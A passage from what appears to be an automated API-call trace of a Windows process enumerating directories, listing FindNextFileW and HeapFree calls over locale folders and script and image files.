cFileName="fr-fr", cAlternateFileName="")) returned 1 [0175.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.212] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0175.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.222] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0175.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.223] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0175.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.224] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.225] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0175.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.225] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0175.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.226] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0175.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.227] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0175.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.228] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0175.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.228] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.229] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.229] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0175.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.229] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0175.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.230] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0175.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.480] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.480] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.480] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.480] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0175.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x4bf, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea28dac, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea28dac, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea28dac, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727688, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0175.481] FindClose (in: hFindFile=0x727688 | out: hFindFile=0x727688) returned 1 [0175.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.481] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeea4f00c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea4f00c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea4f00c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x9838, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0175.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0175.482] FindNextFileW (in: hFindFile=0x727608, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeea02b54, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeea02b54, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeea02b54, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.482] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0175.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.484] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec6510c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec6510c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec6510c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="add-account-select", cAlternateFileName="ADD-AC~2")) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.487] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec6510c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec6510c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec6510c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.487] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec6510c, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec6510c, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec6510c, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 0 [0175.487] FindClose (in: hFindFile=0x727a08 | out: hFindFile=0x727a08) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0175.487] FindNextFileW (in: hFindFile=0x727588, lpFindFileData=0x3b3e69c | out: lpFindFileData=0x3b3e69c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd61dea, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefd61dea, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefd61dea, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="aicuc", cAlternateFileName="")) returned 1 [0175.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.487] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd61dea, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefd61dea, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdd469f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0175.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.490] FindNextFileW (in: hFindFile=0x727bc8, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd8802e, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefd8802e, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdd469f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dark", cAlternateFileName="")) returned 0 [0175.490] FindClose (in: hFindFile=0x727bc8 | out: hFindFile=0x727bc8) returned 1 [0175.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0175.490] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefdd469f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdd469f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdd469f, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="warning.png", cAlternateFileName="")) returned 1 [0175.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0175.490] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdd469f, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdd469f, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe46ba5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0175.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.490] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe46ba5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe20919, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefdfa6fb, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefdfa6fb, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefdfa6fb, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe46ba5, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe46ba5, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xefe46ba5, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0175.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0175.491] FindNextFileW (in: hFindFile=0x727b88, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe20919, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xefe20919, ftLastAccessTime.dwHighDateTime=0x1d39f5d, 